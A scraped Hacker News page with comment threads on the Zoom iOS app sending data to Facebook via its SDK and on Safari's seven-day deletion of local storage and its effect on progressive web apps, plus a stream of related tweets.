It could for example use the ublock lists for automated blocking of all known trackers.

cpv(10000) 1 day ago [-]

Apps like netguard open the eyes.

And it was sad to see in facebook offline activity how much data was linked to me, from apps which have the sdk. And you don't even need to log in via facebook or like/share. The sdk being present and working is enough.

yalogin(4007) 1 day ago [-]

Why do people use zoom at all? I know big companies that use it. A little disconcerting that even large companies don't ask the right questions or do the due diligence and when paying for it.

jdm2212(10000) 1 day ago [-]

It actually works, which sadly makes it way above average.

I've had to switch off between WebEx, Zoom and Hangouts for the last month and Zoom is head and shoulders above the other two in terms of usability and call quality. And there's whatever Cisco's previous craptastic offering was (jabber?) which is far, far worse than any of those three.

callalex(10000) 1 day ago [-]

Big wigs tend to make software purchasing decisions based on marketing, features, price, and nothing else. In that order.

exotree(3126) 1 day ago [-]

Here's a reality for folks: right now, Zoom is literally saving entire corporations and jobs in the midst of a global pandemic. Outside this little bubble, no one is blinking twice at this, and neither is our government; frankly, and that's how it should be. The benefits of Zoom actually _even working at all_ during this time is to be applauded and the engineers and customer service reps should be applauded. This... this right here is a privileged group of people with no conception of what real problems actually look like.

dylan604(3585) 1 day ago [-]

>Zoom is literally saving entire corporations

So, this is the one SV disruptor that is actually changing the world? I hope you didn't break your arm reaching around to pat yourself on the back with that one.

>Outside this little bubble, no one is blinking twice at this,

Might I suggest stepping out of your bubble to realize that the world is not going to end because of the lack of a video conference. People are sheep. Fire is hot and water is wet. 'People are not blinking twice' is not the hill you want to die on. You might as well say 'people are stupid, and we can take advantage of them'. At least that would be honest.

Build an app. If it is good and people want it, they will pay for it. If you want to make it free by selling the data you harvest from the users, then be up front about it and let the users decide. As you stated, people are not 'blinking twice'. Since you are not up front about it, then any good will you might have earned is out the window.

wideasleep1(10000) 1 day ago [-]

Welcome, Zoom employee. The 'privileged' condescension tact will not win friends and influence people. Have you tried meet.jit.si? It's secure and free, no account or download needed. Cheers.

amelius(831) 1 day ago [-]

What does the GDPR say about this?

Anyway, let's just ban targeted advertising already to stop this madness in its roots.

Nextgrid(3983) 1 day ago [-]

GDPR says it's illegal, but its weight is about the same as the UK law that says it's illegal to handle salmon in suspicious circumstances (https://en.wikipedia.org/wiki/Salmon_Act_1986).

A law is only good if there are actual consequences for breaking it and so far there hasn't been any for these kinds of large-scale breaches.

kevin_thibedeau(10000) 2 days ago [-]

The HTC/Nokia phones do this when you open the camera app. Blockable with NoRoot Firewall.

zachware(10000) 2 days ago [-]

I believe NextDNS also blocks this.

_jal(10000) 1 day ago [-]

I want to see the App Store list what entities a given app might communicate with without explicit user request.

If your SDK feeds FB, it needs to be on the label. If you talk to dodgy surveillance shops, ditto. Making this enforceable (plist authorizations, like microphone permissions) is a little tricky, but at the very least smoking out slimy crap like this would be much easier.

wideasleep1(10000) 1 day ago [-]

Never gonna happen. You want the house of cards to come tumbling down?

node-bayarea(2812) 1 day ago [-]

I see that as Zoom's stock price is increasing, people are writing hit pieces against it! Good job!

netsharc(10000) 1 day ago [-]

Such 'hail corporate'... How about you look at it another way: the stock price is increasing because the app just got super popular the last few days, but users might not be aware of the privacy implications of the app, and curious experts started digging into it to see if it's a safe app.

It'd be like saying the people who were investigating Dieselgate were doing it because they wanted to destroy VW's stock price, instead of caring about the health of humans.

ogre_codes(10000) 2 days ago [-]

Every time I read an article with FaceBook in the title I'm a little more glad that I stopped using the service a while ago. Stuck using Zoom for work, but I do use it on a semi-quarantined device so it shouldn't be able to tie it back to my old Facebook account or online activity on my desktop.

conqrr(4259) 2 days ago [-]

Technically it can still link you to the old account through metadata that zoom has on you like your name, workplace etc

Nextgrid(3983) 1 day ago [-]

The problem isn't using Facebook. In fact, if you were knowingly using Facebook it might be considered a fair trade-off that you get stalked in exchange for getting the service for free (not saying it is right, but at least you have all the facts and can decide whether using Facebook is worth it).

The problem is that Facebook stalks you regardless of whether you have an account or not (through their SDKs embedded in pretty much every app).

julianozen(3836) 2 days ago [-]

To clarify, having just worked with the Facebook SDK library for my company's codebase, I dont think it is possible to setup the SDK without this happening. Disclaimer: I do not know what the FacebookSDK does after you call it's launch methods but I am pretty certain that they are required for a least some versions of the SDK.

If you are a Zoom user who is not using a Facebook account, I believe the only info Facebook is getting is that the Zoom app was launched and nothing about the user itself. Unfortunately the side-effect of using the FBSDK is that Facebook can track your app's usage for all users.

I believe this is true of all apps with a 'Login in with Facebook' button. FWIW, it does not appear that other OAuth's do this (including Google's)

xmprt(10000) 1 day ago [-]

Can't they fingerprint the device? The fact that Zoom was launched on a specific device is still a lot more information than I would be comfortable giving up if I don't use Facebook at all.

itronitron(4187) 1 day ago [-]

I imagine in an alternative universe that Snowden's book is about his time at Facebook.

ratww(10000) 1 day ago [-]

FWIW, it's possible to use OAuth login without importing the SDK.

I did it on my last company's apps and webapps when we had to optimise for performance, and removed some dependencies.

Of course, now that I'm gone the SDK is back because one of the developers was bullish on using the SDKs at all costs (the webapp, for example, now loads FB, Google and Linkedin SDKs on launch).

This is a problem that we developers are creating.

sandov(10000) 1 day ago [-]

What's the point of having a closed ecosystem if you allow spyware in your store anyway?

theNarrative24(10000) 1 day ago [-]

You can ban competitor apps and charge big fees.

For the customer? The false feeling of security and privacy. Marketing!

rvz(3575) 2 days ago [-]

Well everything that imports the Facebook SDK or allows sign in with Facebook does this so as long as an app has that blue button on the screen, you shouldn't be surprised that it will phone home to Facebook once the app is opened and initialised.

Too bad it isn't practical to have a system-wide blacklist of selected hosts on iOS. Maybe you can but requires a jailbreak, but that too can break some apps.

newscracker(3530) 2 days ago [-]

There are some "VPN" apps that can stop connections system-wide. I'm not sure about custom block lists, but take a look at the free Lockdown app (it's FOSS). It does all processing on-device. There's also a paid app (which for me is an expensive subscription) called Guardian Firewall, which uses its servers to process requests.

Daniel_sk(4344) 2 days ago [-]

A lot of apps are doing it without the developers even knowing about (ask me how I know). You just integrate their SDK for social login or something else and it will start sending data to the mothership.

ryandrake(4255) 1 day ago [-]

This is one of the reasons why you are supposed to audit your dependencies and understand what they do. There is no excuse for an app developer to ship their app and not know what it does.

gentleman11(10000) 1 day ago [-]

So what options do we have for private video conferencing?

samueloph(10000) 1 day ago [-]

jitsi

1over137(10000) 1 day ago [-]

jitsi-meet, see:

https://meet.jit.si/ https://github.com/jitsi/jitsi-meet

You can self-host it, or use the first link. No need to give your email, name, or phone number.

gentleman11(10000) 1 day ago [-]

Is whereby any good for privacy? I found this in the privacy policy. I like the app for usability

> We will never collect or record the content in conversations.

clement_b(10000) 2 days ago [-]

Ahem. That's just Facebook Analytics. Yes, it should be mentioned in the privacy policy, especially if they operate in countries under the GDPR (they do).

But having a go at Zoom on this ground is unfair, given many developers do the exact same thing.

cuspycode(10000) 1 day ago [-]

So maybe it's unfair, but unfair is perfectly OK in this kind of situation. The important thing is to call it out and make it stop, even if this has to be done for one perpetrator at a time.

jacobwilliamroy(4255) 2 days ago [-]

Lets have a go at those other developers too, then.

ncr100(10000) 1 day ago [-]

Because Facebook could figure out WHO YOU ARE TALKING WITH. If you're talking with someone 'sensitive', Facebook will know.

Perhaps FB needs to use heuristics to join Caller A with Caller B based upon timestamps, etc.

But ZOOM is a messaging app and the IMPLICATION is that FB will know some EXTRA DETAIL about my private life: the other people in it.

It's not like this is CANDY CRUSH - duh that's just some game. This is ZOOM, a face-to-face communications app. Much more serious.

Apple should flag this for its users on the App Store.

yjftsjthsd-h(10000) 2 days ago [-]

How does that make it better? Does FB not commingle the data? And no, others doing the same doesn't make this better, it makes them all bad.

ilikehurdles(10000) 1 day ago [-]

Analytics that fingerprints a device, figerprints that facebook can then use to build shadow profiles of people not consenting to have their data processed and stored by facebook.

untog(2451) 1 day ago [-]

People crap on the web for its privacy record - justifiably - but at least you can open dev tools and see what the page is doing. Selling apps as being better for privacy just seems like a complete misstatement.

Polylactic_acid(10000) 1 day ago [-]

And you can install extensions that do that for you and actually block the requests. I'm not aware of any tool to block the facebook sdk in apps.

samstave(3899) 1 day ago [-]

So facebook sent me a cease and desist threat for revealing that they were tracking all vehicles driving by their campus and then telling the city of menlo park of this.

So facebook, i want you to cease and desist in tracking anything and everything about me or anyone who wants nothing to do with your leviathan of bullshit tracking or pay out the ass and prove all my data has been deleted, and provide me a manner with which i can audit you for having no data on me.

If not, lets reveal all the other things you track on people who want nothing to do with you.

dylan604(3585) 1 day ago [-]

>So facebook sent me a cease and desist threat for revealing that they were tracking all vehicles driving by their campus and then telling the city of menlo park of this.

Do you have a blog or some such going into more details? This raises all sorts of curiousness. How did you find out this is what was going on? What justifications did FB claim for doing the tracking? What justifications did FB claim for stopping you from talking about it? As the Robot says 'Data inadequate!'

klathzazt(10000) 1 day ago [-]

Criminalize targeted advertising

dylan604(3585) 1 day ago [-]

And what agency will police that policy?





Historical Discussions: Private client-side-only PWAs are hard, but now Apple made them impossible (March 25, 2020: 952 points)

(955) Private client-side-only PWAs are hard, but now Apple made them impossible

955 points 3 days ago by soapdog in 4079th position

andregarzia.com | Estimated reading time – 14 minutes | comments | anchor

PWAs are awesome. If your own personal subjective opinion on them is that they are shit, you're free to not use them. It is not OK for you, or Apple to cripple mine though. Oh, and this affects the whole web not just PWAs, you should read on.

2 days ago

Freedom in software is only possible if the operating system also protects the user's freedom. Another unfortunate decision by Apple:

2 days ago

Freedom in software is only possible if the operating system also protects the user's freedom. Another unfortunate decision by Apple:

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible L: andregarzia.com/2020/03/privat... C: news.ycombinator.com/item?id=226866...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible : andregarzia.com/2020/03/privat... #Apple Comments: news.ycombinator.com/item?id=226866...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

The first two items are web developers fault, the second is the browser vendors fault, the third is solvable with web share api. All what you're complaining there are not issues not to have PWAs, they are reasons to improve on them.

2 days ago

Is this the death of the PWA? Maybe ... I doubt it though ... andregarzia.com/2020/03/privat...

2 days ago

iOS and iPadOS 13.4 and Safari 13.1 on macOS: '...deleting all of a website's script-writable storage after seven days of Safari use without user interaction on the site' Affected: Indexed DB LocalStorage Media keys SessionStorage Service Worker registrations

2 days ago

that are just sites but without chromes toolbar. can kindle read from your local library? can kindle save books to you local lib? can spotify buffer 1 hour to you local drive? can spotify play from your drive?

2 days ago

As an example, years ago I created a comic reader as a pure client-side app. It could read comics from your hard drive, it would save them to indexeddb. You could add online drives to it and then it would fetch them all and save, or you could drag and drop a bunch of cbrs.

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

andregarzia.com/2020/03/privat... 'Private client-side-only PWAs are hard, but now Apple made them impossible.' #pwa #apple #FrontEnd

2 days ago

Am I right in my reading that, if your app has been added to the home screen, it's not subject to the 7-day timer?

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

It appears so but in the same paragraph it says that it keeps a separate day counter for installed apps, so I don't know why they keep that counter if they are not erasing it. I'm not sure at all. This affects all non-installed web apps though

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat... (news.ycombinator.com/item?id=226866...)

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible (posted by soapdog) #1 on HN: andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

It's confusingly worded, but I took it to mean'if your website is not used within 7 days of safari use, the data is deleted; but if it's installed, then it's if your website is not used within 7 days of your website's use, which is unlikely' but yeah sucks for non-installed sites

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible. andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat... (news.ycombinator.com/item?id=226866...)

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible -- andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat... (news.ycombinator.com/item?id=226866...)

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat... (news.ycombinator.com/item?id=226866...)

2 days ago

You should update your post, it has since been released that this update does not impact web apps installed to the home screen. Let's avoid spreading rumors that PWAs are crippled, as we've learned that is not the case.

2 days ago

Def confusing, but you nailed it: installed web app + browser are pegged to each other as a separate instance from Safari, so any day of use = website use for home screen apps. Counter always stays at zero. 🥳

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible. andregarzia.com/2020/03/privat...

2 days ago

That will make it really hard to make PWAs that are real apps andregarzia.com/2020/03/privat...

2 days ago

'Private client-side-only PWAs are hard, but now Apple made them impossible' andregarzia.com/2020/03/privat...

2 days ago

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

Yesterday

Private client-side-only PWAs are hard, but now Apple made them impossible (andregarzia.com) : ift.tt/2Um5YyR

Yesterday

be aware that PWAs are still PWAs regardless if they are installed or not. Installing is an optional step if you want it on the home screen, you might maintain it as a bookmark on the browser, in which case they are crippled. It is not a rumor, it is on WebKit blog post.

Yesterday

Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

Yesterday

That's fair, but this is an important distinction. While not ideal, I don't think most users have expectations around offline capabilities for past-visited / bookmarked sites. Much of the uproar about this update was around crippling installed Web apps, and this has not happened.

Yesterday

An example, I've built a comics reader. It loads comics into indexedb from an online drive, or from your dragging and dropping the files into it. Once added, the user has expectations that the data will be there. There is no server, the data is local-only. (thread)

Yesterday

If they spent seven days without opening the app, that data would be gone. There are shopping list pwas where people keep adding stuff to buy eventually with bookmarklets. That data will be gone.

Yesterday

Agree this sucks! But not the *most* unreasonable approach by Apple. I'm happy that this still possible if app is installed, and is solvable by communicating to users that they need to install the app for data to persist past 7 (min) days. Assume installation is the goal anyway.

Yesterday

This is true, and I would like to see this solved. Long-term, I am optimistic that Safari will get with the times, short term I feel better because of Chrome's market share on macOS.

Yesterday

but installation is not the goal. The user should not be forced to install anything. The most important letter in PWA is W. Installation to the homescreen is just a convenience. The service worker, all the other APIs, they are working regardless if the app is on the homescreen.

Yesterday

Agree, my biggest gripe of all at the moment 😤. But unrelated to today's announcement. To be clear, I agree with you on most points. I do think that Apple is hostile to Web in order to prop up the app store. I hate it.

Yesterday

Shortcuts-based workaround

One workaround for this is to make a Shortcut that has page data embedded in it as base64, and opens it in Safari. To fix the LocalStorage issue, you can add a button labeled 'Sync data to Phone' or something similar that will sync the data to a Dropbox or iCloud Drive file, again, using Shortcuts. This post is a reply to 'Private client-side-only PWAs are hard, but now Apple made them impossible'

Yesterday

Ok, you make a good philosophical point. I guess I just worry that with too much doom and gloom, devs will be turned off of PWAs. Apple will only become Web friendly if forced through antitrust, or if there is a booming ecosystem of PWAs. I mainly hold out hope for the latter.

Yesterday

In the name of privacy, PWA & all legitimate use cases for browser storage (👋 UX) just got the middle finger. Ads will be less relevant to you... yay? 🤷‍♂️ Saddle up for LOTS of downloadable electron apps. RIP batteries andregarzia.com/2020/03/privat...

Yesterday

ITPのアップデートで、サードパーティーCookieが完全ブロックされましたが、加えて、LocalStorageについても、プライバシー保護の観点で、そのサイトに1週間アクセスしなければ、データが削除されるようになりました。 andregarzia.com/2020/03/privat...

Yesterday

ITPのアップデートで、サードパーティーCookieが完全ブロックされましたが、加えて、LocalStorageについても、プライバシー保護の観点で、そのサイトに1週間アクセスしなければ、データが削除されるようになりました。 andregarzia.com/2020/03/privat...

Yesterday

This is inconceivable. Apple is going to clear localStorage of web apps that have been idle for 7 days. They are breaking everything. andregarzia.com/2020/03/privat...

Yesterday

Progressive Web Apps on the open web are an attack on Apple's App Store. Apple is fighting back - andregarzia.com/2020/03/privat...

Yesterday

Private client-side-only PWAs are hard, but now Apple made them impossible. andregarzia.com/2020/03/privat...

Yesterday

The state of #PWA|s on smartphones makes me sad. So many conceptual problems listed in this thread. Most frustrating: users downvoting web apps in the Play Store, b/c they think it's „not a real app". #webdev andregarzia.com/2020/03/privat...

Yesterday

754 – Private client-side-only PWAs are hard, but now Apple made them impossible andregarzia.com/2020/03/privat...

Yesterday

Private client-side-only PWAs are hard, but now Apple made them impossible: andregarzia.com/2020/03/privat... ( news.ycombinator.com/item?id=226866... )

Yesterday

Clearly, Apple sees PWAs as a threat to their app store revenue, and they're trying to disguise is as improving privacy for users. andregarzia.com/2020/03/privat...

Yesterday

No more PWA. So, we are stuck with 'Responsive Websites' + Mobile Apps. andregarzia.com/2020/03/privat...

Yesterday

@Alfayo_Kat after publishing your first app on the apple store , here are some bad and good news andregarzia.com/2020/03/privat...

Yesterday

Private client-side-only PWAs are hard, but now Apple made them impossible. andregarzia.com/2020/03/privat...

Yesterday

'Private client-side-only PWAs are hard, but now Apple made them impossible' andregarzia.com/2020/03/privat... Of course, critical apps should never rely on 3rd party servers or even App Store. SecureBookmark technique via data: URI is much more powerful: coins.github.io/secure-bookmar...

Yesterday

Private client-side-only PWAs are hard, but now Apple made them impossible. andregarzia.com/2020/03/privat...

Yesterday

Not great for those of us with PWA's... especially if you care about Apple users andregarzia.com/2020/03/privat...

7 hours ago

Private client-side-only #progressive #webapps are hard, but now #Apple made them impossible andregarzia.com/2020/03/privat... via @soapdog

5 hours ago

If you want to read about full third-party cookie blocking in Safari and what that means for PWAs potentially: webkit.org/blog/10218/ful... andregarzia.com/2020/03/privat...

5 hours ago

Private client-side-only PWAs are hard, but now Apple made them impossible. andregarzia.com/2020/03/privat...

3 hours ago



All Comments: [-] | anchor

dubcanada(4144) 3 days ago [-]

I don't understand what the problem is.

I can easily go to the settings area and delete my entire browser cache (Remove All Website Data), in fact if you are running low of space it even tells you to do it.

Why are people assuming things stored on a browser are a good place to store things. Nothing stored on a browser should be assumed to be forever.

beering(10000) 3 days ago [-]

If you read the article, that's the issue the author was talking about: it's basically impossible to make an app that can store its data locally, instead of on some web server.

All apps that you download from App Store can live offline, where they're usable without Internet or trusting some faraway web server.

You can't make a web app that can do that, and to some people it smells like Apple trying to force developers to release through App Store.

riquito(4308) 3 days ago [-]

If you are distribting a PWA through e.g. electron the user does not have (easily) the means to delete the cache. Web app is a misnomer in that case, they are just applications running inside a somewhat hidden browser.

notduncansmith(4049) 3 days ago [-]

I also don't understand the alarm.

There is no hard limit on how long things will be stored. Data in localStorage might still be stored for weeks/months/years, as before.

The only limit is on how long things will be stored if the user does not interact with the site/PWA.

If you are a website, not a natively-installed app, that I haven't 'used' in a first-party sense for 7 days or more, I don't think your data belongs on my device.

Storage space can be limited, and any app I haven't used in 7 days should be happy to re-fetch my data from a server or convince me to install their native app.

To act like this is some nefarious plan by Apple to get people to build native apps instead of PWAs is absurd. If a PWA was written properly in the first place, this change will have basically 0 impact on it.

onion2k(2103) 3 days ago [-]

There's a big difference between a user choosing to clear their data and a browser vendor deciding to clear a user's data.

arendtio(10000) 3 days ago [-]

The problem is, that it rarely happens under normal circumstances. So you might build a logic which synchronizes your data to the server but rarely has to download it as most of the time it still has a relatively current snapshot. And the few times you have to download everything, it is ok for the user to wait a while.

But if you have to wait every time your last interaction is more than 7 days ago, the whole experience will change. And supporting a reliable offline experience will be very hard to build.

ravenstine(10000) 3 days ago [-]

That's like asking why people store files on disks when they could store everything in the cloud.

daleharvey(1016) 3 days ago [-]

I can delete data from my hard drive, why are people assuming things stored on a computer is a good place to store things. Nothing stored on a computer should assumed to be forever

themihai(4031) 3 days ago [-]

Offline Web Apps were already weak(i.e. CORS restrictions). Now they are even more useless with this storage limitation. You can't really blame Apple.. after all, Google claimed that offline web apps are nothing more than websites so that's what we have... I don't mind if Safari deletes offline data stored by websites every week so why would I complain about 'offline apps' ?

My point is that Offline Web Apps (i.e. PWA) that are installed on user's desktop should have a bit more permissions than websites but people in charge(google, apple etc) seems to think otherwise.

https://discourse.wicg.io/t/proposal-full-network-access-in-...

pier25(2695) 3 days ago [-]

Read the article, it's not only about offline PWAs. All local storage is deleted after 7 days.

eyesee(10000) 3 days ago [-]

Would it be possible for Apple to relax the 7 day limit for apps that are strictly client side only? I.e. sandbox the apps to not allow access to any remote resources? It seems to me the opportunity to exploit a user's privacy would be very limited without exfil.

icebraining(3767) 3 days ago [-]

Maybe, but it would only apply to a subset of PWAs. For example OP's RSS reader must access remote resources.

rconti(10000) 3 days ago [-]

> What are private client-side PWAs anyway?

(proceeds to not answer the question)

Found the answer: Progressive Web Apps[1]

1: https://medium.com/@amberleyjohanna/seriously-though-what-is...

soapdog(4079) 3 days ago [-]

Sorry, I wrote this blog post too fast because I was/am a bit angry and didn't notice my usage of jargon without explanation.

It is a "Progressive Web App". Sorry for the jargon usage without explanation. Basically it is a marketing term used to place some new web APIs and best practices into an umbrella of a "near native UX on a Web App". What it usually means is that your application is:

* Served from a secure context (a requirement for the other APIs anyway).

* Has an application manifest (this contains metadata about your web app and is used by browsers and OSs to add icons, names, themes, etc)

* Has a service worker (which enables your application to potentially work offline beyond what other cache solutions did in the past)

So with these in place, browsers can offer a "Install this site and an app" feature which allows the site to open in its own window, with its own icon and name on the launchers and home screens.

MaxBarraclough(10000) 3 days ago [-]

As the article explains, Offline Web App is being used to mean Progressive Web Application (the standard terminology).

(edit Turns out that's not quite right, see diggan's reply.)

From the article:

> You'd almost think they had an App Store to promote or something.

There's certainly a tension here. I'm still not sure why more vendors don't make iOS PWAs to get around the App Store payment rules.

Perhaps related: Very roughly a year ago, something changed in iOS that broke the 2048 PWA. Its swipe-detection no longer works. A pity.

diggan(872) 3 days ago [-]

offline web apps are different than PWA. A PWA doesn't necessarily work offline, but more is independent from the connection / loading of it. I do think most PWAs do work offline, but doesn't mean it's a requirement to call it a PWA.

Similarly, an offline capable web app is not necessarily a PWA, as PWA carries a lot of features to it besides being offline capable.

criddell(4281) 3 days ago [-]

> I'm still not sure why more vendors don't make iOS PWAs to get around the App Store payment rules.

Because users won't use them. For users that don't have a technical background: if it isn't in the app store then it essentially isn't an app. For techie users: lots of us don't want web apps because of the power, memory, and bandwidth usage is often higher than a well written native app. The fact that there's a gatekeeper who has some control over what shows up in the app store is usually a feature and not a bug.

If there were big parts of the app ecosystem that didn't have native apps, then eventually users would find web apps. But that isn't the case. Think of anything and search for it in the app store and there's an app for it (including 2048).

vbezhenar(3839) 3 days ago [-]

> I'm still not sure why more vendors don't make iOS PWAs to get around the App Store payment rules.

One reason is because Apple have incentive to break PWAs and they will do it. It's not a wise business decision to act against big player.

arghwhat(10000) 3 days ago [-]

Better title: Apple restricts tracking by limiting browser storage, which hurts my particular app.

Browsers need to be severely limited due to them running arbitrary code from the web. Doesn't matter if it's an offline web app. If you want more access, make a native app (with or without web technologies).

megous(4302) 3 days ago [-]

> If you want more access, make a native app (with or without web technologies).

How's installing a native app better for a random user privacy or security wise, exactly?

Wowfunhappy(3954) 3 days ago [-]

And, um, any other app which saves local data locally.

m-p-3(10000) 3 days ago [-]

> If you want more access

which is somewhat ironic, because the goal of a web app is to break free of the walled garden and become OS-independant.

the_gipsy(10000) 3 days ago [-]

> If you want more access, make a native app

...and give apple their cut. Why not add permissions to webapps? Like location, or push notification... oh that's another feature that happens to be missing only in safari.

Just accepting these moves from apple as 'in the interest of users' is naïve. Apple has a huge vesting in their appstore, and every webapp is a potential appstore-app that is some lost revenue.

I mean, maybe apple is right, and the web should go back to a readonly document-like format, like in the old days. Articles and links. Apps for everything else. But let's not kid ourselves that they do it purely in the user's interest.

fierarul(4261) 3 days ago [-]

But browsers are severely sandboxed already. What the article is talking about is:

> deleting all local storage (including Indexed DB, etc.) after 7 days

which I can see how it might help privacy (since you could be tracked via local storage too) but also how it might break any potential web app that might need data to last more than 7 days.

> If you want more access, make a native app

But then, everybody will complain about yet another Electron app, right? Not to mention that you have to fork over $99 and go through the signing / notarization hoops that change from one week to the other.

I think in the name of privacy and security only Apple and some select few corporations will be allowed to make software in the future. macOS / iOS and Windows 10 are evolutionary dead ends in many ways.

pier25(2695) 3 days ago [-]

> which hurts my particular app

A big chunk of the web these days uses JWT and localStorage for auth.

codesections(1765) 3 days ago [-]

> Apple restricts tracking by limiting browser storage

But the argument that this will protect privacy in the first place seems really weak.

Before this change in Apple's policy, an app could store my config data on my PC.

After this change, they'd need to have me log in and send the config data to their servers.

That seems like I've lost privacy, not gained it.

TeMPOraL(2761) 3 days ago [-]

It's not 'limiting browser storage', it's making browser storage expire. TFA's example is just some random app, but this essentially kills the entire concept of an offline-first web app, and severely hurts the browser as an application platform.

manigandham(779) 3 days ago [-]

Technically local data is more private than contacting a remote server to download it again. I don't see that being a controversial stance.

k__(3378) 3 days ago [-]

I know this is ad hominem, but your comment just sounds like 'I make big money with native apps and don't want web apps to catch up!'

vbezhenar(3839) 3 days ago [-]

> If you want more access, make a native app (with or without web technologies).

Browsers usually ask for an additional permission in this case which would be a good approach. Your post sounds like 'browsers need to be severely limited, so if you want to watch video, just launch VLC'. It does not work this way.

alerighi(10000) 3 days ago [-]

Making a native app is more complicated than making a webapp, especially if you want something cross platform. Browsers are now an universal virtual machine, what was the JVM years ago, and with webassembly we will se more and more things done in the browser.

The real 'write once, run everywhere' are webapps, a webapp doesn't care if you are using Apple, Windows, Linux, BSD, whatever, if you have a compatible browser you use the app.

Sure there is Electron (or React Native), to me it doesn't make sense, what is the point that every application needs to ship basically a browser? And still Electron apps need to be compiled and packaged for every platform, while with webapps you enter the URL in the browser and you are done with it.

Doesn't adding APIs to browsers not only to use the local storage but also to access the filesystem of your device (of course asking the permission to the user) make more sense?

Of course what really Apple fears is loosing the control of the apps that gets used on their device, now they control the App Store that is the only way to get apps on their devices (beside jailbreak), with webapps is different, since you can access them directly from the browser.

And the thing that is absurd is that the first iPhone didn't have the App Store since Apple decided that the only way to get third party apps was trough the browser, now they are aiming for the opposite thing.

zzzcpan(3749) 3 days ago [-]

> Browsers need to be severely limited due to them running arbitrary code from the web. Doesn't matter if it's an offline web app. If you want more access, make a native app (with or without web technologies).

Native apps have the same problems too and such 'severe' limiting of apps in web browsers still doesn't solve it. The only more or less privacy preserving model I can think of for native apps today is open source repositories with app distribution not controlled by app developers, like f-droid or repositories in various linux distros.

untog(2451) 3 days ago [-]

Genuine question: what makes native ad frameworks different here? They execute with the same privilege of their containing app so surely they're open to similar privacy concerns. Shouldn't native apps have their storage cleared?

kkarakk(10000) 3 days ago [-]

OR maybe it's apple's responsibility to figure out how that usecase can exist without security flaws?

As a customer, I'm tired of devices functionality being limited coz 'security risks'. Functionality that is arguably superior to native apps apart from the security risk.

greggman3(10000) 3 days ago [-]

Wouldn't making it first party only cover it? I don't see how this has anything to do with privacy/tracking. webpages can still leave long term cookies. The only way this is a privacy issues is if 3rd party iframes can use localstorage but just like 3rd party resources have their cookies blocked so to could localstorage.

Otherwise this has absolutely nothing to do with privacy or tracking.

bg0(10000) 3 days ago [-]

I really appreciate this link. I would have never seen this otherwise. It's kind of a disappointment for us on the enterprise side. Our main offering is an offline app where people are disconnected from the internet for weeks and we use localStorage to validate who they are. It's a bit vague about how this affects apps that don't use safari. Nevertheless, we might have to start to really think about the user experience here now that this update is out.

roywashere(10000) 3 days ago [-]

To be honest, HTML5 LocalStorage was always different on iOS when compared to other platforms. The iOS browser localstorage is stored in /caches so it is cleaned when the device goes low on disk space. I found out the hard way, had a cordova app which ran on Android and iOS (and web) and saved an account token in LocalStorage. Some iOS users kept on getting logged out, mostly users with smaller size iPhones!

Now we store the account token in iOS keyring and that works.

ref: https://stackoverflow.com/questions/32927070/complete-data-l...

yohannparis(10000) 3 days ago [-]

Webkit's website says: '[..] deleting all of a website's script-writable storage after seven days of Safari use without user interaction on the site.'

It is not clear that a user coming to your website before the 7 days, even offline, is exempt of it.

duxup(4060) 3 days ago [-]

Yeah I've got a lot of users with very shaky internet and intermittent involvement with a given application (not using it for a month, more). This presents some serious challenges / impossibilities for those user's use of a web app when they're not online.

I hope they come up with some good options as this news settles. It's hard to see this as anything but even just a accidental push ('well you should always have written an app for the app store') to force folks to write a native app / participate in the app store.

diggan(872) 3 days ago [-]

Yeah, as far as I understand, cookies is the only storage method that will be left to use for long-term storage of user data. If I'm wrong, someone please correct me.

Edit: getting downvoted without any reasoning provided, so I assume I'm incorrect, there are more/less ways of storing data in the future for Safari users?

yesimahuman(2544) 3 days ago [-]

If you're using Cordova or Capacitor this is why, at Ionic, we recommend never using localStorage for storing important data. Better to use an explicit filesystem storage solution like SQLite.

nradov(905) 3 days ago [-]

Have you considered porting to a native application?

nicoburns(10000) 3 days ago [-]

I really hope the outcry about this is big enough to get Apple / Webkit reconsider. With service workers and improvements in browsers/cpus 'PWA's (aka web apps) were just getting to the point where they could compete with native apps for a number of use cases. And they had much better privacy / security policies. This doesn't completely kill that, but it's a big setback.

pier25(2695) 3 days ago [-]

> I really hope the outcry about this is big enough to get Apple / Webkit reconsider

I seriously doubt it. Apple has been undermining web dev for years.

JumpCrisscross(38) 3 days ago [-]

> they had much better privacy / security policies

Why is a PWA better from a privacy or security perspective than a native app?

vanderZwan(3173) 3 days ago [-]

I would be OK with 7 days being the default with a permission model where I can grant a website longer storage time.

Actually, I'd be even happier if any form of offline storage required explicit user permission anyway.

m-p-3(10000) 3 days ago [-]

There's certainly a balance to achieve there. Too few permissions prompt and you lose control, and too many and you get desensitized or even worse annoyed at them.

layoutIfNeeded(10000) 3 days ago [-]

Both network usage (in native apps) and storage (both for native and web apps) should prompt for permission IMO.

streptomycin(4237) 3 days ago [-]

Even before this change, data in IndexedDB was kind of volatile - if a device was low on space, browsers could delete stored data.

